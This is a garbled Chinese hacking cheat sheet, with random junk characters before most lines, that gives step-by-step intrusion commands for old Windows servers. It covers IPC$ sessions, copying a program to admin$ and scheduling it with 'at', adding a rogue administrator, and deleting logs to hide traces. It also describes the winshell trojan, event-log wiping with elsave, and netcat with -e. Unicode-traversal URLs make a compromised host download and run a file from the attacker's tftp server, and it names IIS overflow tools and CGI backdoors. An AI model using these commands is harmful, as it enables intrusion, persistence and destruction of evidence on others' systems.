网管和黑客都必须知道的命令
��Munal=wL 常用的几条NET命令:
)�>X
C_ R r�`8>@2sW1 (与远程主机建立空管连接) net use \\IP地址\ipc$ "" /use:""
/eI�]�!a�� =�bw�uLno> (以管理员身份登录远程主机) net use \\IP地址\ipc$ "密码" /use:"Administrator"
=OUms�@xcE h�fBZ:e�s+ (传送文件到远程主机WINNT目录下)copy 本机目录路径\程序 \\IP地址\admin$
N��U��vHY: ��R�3`h$`G (查看远程主机时间) net time \\IP地址
*=p[;V���� (X��?'}�Ur (定时启动某个程序) at \\IP地址 02:18 readme.exe
>Y\$9W=t�� 'q:�t�48& (查看共享) net view \\IP地址
ff3HR+%�M� 0:SR�29(p1 (查看netbios工作组列表) nbtstat -A IP地址
���3cH`>#c (Q�/�Kp*a� (将远程主机C盘映射为自己的F盘) net use f: \\IP地址\c$ ""/user:"Administrator"
s?�g`ufF.t {@7{!I|�eD (这两条把自己增加到管理员组): net user 用户名 密码 /add
i7UE9�Nyl* >cE��@m=�[ net localgroup Administrators 用户名 /add
.e,(}_[[<� ��*�t-Wo�l (断开连接) net use \\IP地址\ipc$ /delete
�2
u{"�R� �UDUj����� 扫尾:
�4-�wC�k=I {}W��9m)I� del C:\winnt\system32\logfiles\*.*
PI5a�'�k0F Y��4 ��<� del C:\winnt\ssytem32\config\*.evt
�XC
D��&Im n:#gKR-J� del C:\winnt\system32\dtclog\*.*
Q#�2�gjR r �;<9���dND del C:\winnt\system32\*.log
(i"�@{[IP� WN�+D}z�]� del C:\winnt\system32\*.txt
��c�@]_�V
sr*3uI-)�L del C:\winnt\*.txt
m/`�"~@}& rphfW:���� del C:\winnt\*.log
zx�V,v*L) �r���z���� 一、netsvc.exe
b;���;C�>< �AusCU~�:> 下面的命令分别是列出主机上的服务项目、查寻和远程启动主机的“时间任务”服务:
VX`E7Sf!�} �T,sArK�BI netsvc /list \\IP地址
6u�'�+#�nm �a+�--2+~= netsvc schedule \\IP地址 /query
8!T6N2�O6d aUBGp:� �( netsvc \\IP地址 schedule /start
x�<���S�?" �5dPPm%U{� 二、OpenTelnet.exe
u�zA_Z�jx �.Y����T&V 远程启动主机的Telnet服务,并绑定端口到7878,例如:
�O'OV�j�� 0CT�UcVM#9 OpenTelnet \\IP地址 用户名 密码 1 7878
�E[Rd=�/P6 sU�ki|l�P 然后就可以telnet到主机的7878端口,进入DOS方式下:
"�/O`#Do/� h�)MU^��aP telnet IP地址 7878
X;hV�+|�Bo �)<vU F]e~ 三、winshell.exe
<![�]=~z�$ ��k7��0o=} 一个非常小的木马(不到6K),telnet到主机的7878端口,输入密码winshell,当看到CMD>后,可打下面的命令:
��e{�~3&�� &f:"p�*=a\ p Path (查看winshell主程序的路径信息)
��has \W\( {�}�#�W~1` b reBoot (重新启动机器)
%p�R:�.u|� :+G1=TuXw~ d shutDown (关闭机器)
x�P3�v65Q1 *A�>I)�a<: s Shell (执行后你就会看到可爱的“C:\>”)
FBR]) h'�Z 7LQLeQ�vB� x eXit (退出本次登录会话,此命令并不终止winshell的运行)
���-j6&W` &6�yh4-�(7 CMD>
http://.../srv.exe (通过http下载其他网站上的文件到运行winshell的机器上)
\}:&H�l+�� 7<ZP��(I5X 四、3389登陆器,GUI方式登录远程主机的
RkrZncBgV< z&�3��i��n 五、elsave.exe
cr&sI�=�i� SX�A`o<�Ma 事件日志清除工具
i��Etnw�St L��~,x~sLd elsave -s \\IP地址 -l "application" -C
mX2(SFpJar /]mf�I&l+9 elsave -s \\IP地址 -l "system" -C
�~ PO)>��; G�<�S(P@ss elsave -s \\IP地址 -l "security" -C
Ro�G
�`U�� c���']3�N� 执行后成功清除应用程序日志,系统日志,安全日志
~���.FZF�� zB8 @�W�l 六、hbulot.exe
h7�}D//�~p �aB��H!K
� 开启win2kserver和winxp的3389服务
+E{'A7im8= jlf��.~�vt hbulot [/r]
xUiSAKrcM� c%��5G�3�j 使用/r表示安装完成后自动重起目标使设置生效。
�r&u�&$�"c �K�KPQ�[3g 七、nc.exe(netcat.exe)
#�i8]� �f{ ]
B��J�]� 一个很好的工具,一些脚本程序都要用到它,也可做溢出后的连接用。
~w&��_l57� 8��:����x{ 想要连接到某处: nc [-options] hostname port[s] [ports] ...
.+;;�-]})� Y�"�x9B%e� 绑定端口等待连接: nc -l -p port [-options] [hostname] [port]
V*uo�GWL]+ �l;N?*2zm[ 参数:
)&Bf%��1>� N,iY�UM?�� -e prog 程序重定向,一旦连接,就执行 [危险!!]
j���J}3WJ� rW.o_z0�3^ -g gateway source-routing hop point[s], up to 8
�:{(�` ;fJ X0h`g)Bbf -G num source-routing pointer: 4, 8, 12, ...
8BL�]]gT-I *gq~~�(j�H -h 帮助信息
9K�9{$�jN~ *�0K@^D�b- -i secs 延时的间隔
({G�N.pC(� �3X0"</G6� -l 监听模式,用于入站连接
G,V�TFM�6� �J
FYV@%1~ -n 指定数字的IP地址,不能用hostname
iiWs�]�5 \c"{V-#�o\ -o file 记录16进制的传输
%Km��^_JM� �-v��'|�#q -p port 本地端口号
G(g.~|=E�Z yX^/Oc@�j� -r 任意指定本地及远程端口
��Rh[%�UNl @Kx�@ 2#~b -s addr 本地源地址
s/;i�ZiWK� l�W�VvAo�e -u UDP模式
X9J&O�Q�[W Rl. Y�F+YH -v 详细输出——用两个-v可得到更详细的内容
*A2D}X3�s �W?�`%�it5 -w secs timeout的时间
w^_�[(9
`� [VD�)DO��5 -z 将输入输出关掉——用于扫描时
{Qe�7/l�n! 八、TFTPD32.EXE
V��Z#@7t�� [&tN(K��9* 把自己的电脑临时变为一台FTP服务器,让肉鸡来下载文件,tftp命令要在肉鸡上执行,通常要利用Unicode漏洞或telnet到肉鸡,例如:
!\)9f�OLs� cc*xHv�^�� http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c tftp -i 本机IP地址 get 文件名 c:\winnt\system32\文件名
?8�9K�
[D| �Rxg�^v�M* 然后可以直接令文件运行:
l�*v6U'�J� TA2?Ia;@xV http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c+文件名
t_VF=B^LuR SuO@LroxTB 九、prihack.exe是IIS的printer远程缓冲区溢出工具。idqover.exe是溢出idq的,选择“溢出后在一个端口监听”,然后用telnet连接它的监听端口,如果溢出成功,一连它的端口,绑定的命令马上执行。xploit.exe是一个图形界面的ida溢出,成功以后winxp下需要打winxp。
7$z]o�VbO' \Ax[/J2aO 一○、ntis.exe、cmd.exe和cmdasp.asp是三个cgi-backdoor,exe要放到cgi-bin目录下,asp放到有ASP执行权限的目录。然后用IE浏览器连接。
��"kS(�b4^ ]r|�nz~Aa$ 一、一 Xscan命令行运行参数说明:
U{8]TEv��� %u��t^� �O 在检测过程中,按"[空格]"键可以查看各线程状态及扫描进度,按"q"键保存当前数据后提前退出程序,按"<ctrl+c>"强行关闭程序。
'�Ti7}��K� 6���lp.0B 1.命令格式: xscan -host <起始IP>[-<终止IP>] <检测项目> [其他选项]
u?ALZ�x�j? q ,��C)A�Z xscan -file <主机列表文件名> <检测项目> [其他选项]
W)RCo}f��� ��G��2�� 其中<检测项目> 含义如下:
�#�QW�G5 �k*?Axk�#� -port : 检测常用服务的端口状态(可通过\dat\config.ini文件的"PORT-SCAN-OPTIONS\PORT-LIST"项定制待检测端口列表);
5.�_=m"�Pl Za��*QX|�� -ftp : 检测FTP弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);
>+�9f{FP
9 Tl�z $�LI� -ntpass : 检测NT-Server弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);
T6P9Icv?@7 |#87|XIJ&~ -cgi : 检测CGI漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案);
aUqVcEU�1� +d$�l1j -iis : 检测IIS漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案);
ls^|��j%$J K�&\3j�-8^ [其他选项] 含义如下:
��=b{!�p�| h�C nqe��� -v: 显示详细扫描进度
lZ�t�{L0�� `�8.Oc;*zu -p: 跳过Ping不通的主机
2�[O\"a�%� |uT�&M`7\{ -o: 跳过没有检测到开放端口的主机
�+2ZBj6 e9 Zx1�I&K\Cd -t <并发线程数量[,并发主机数量]>: 指定最大并发线程数量和并发主机数量, 默认数量为100,10
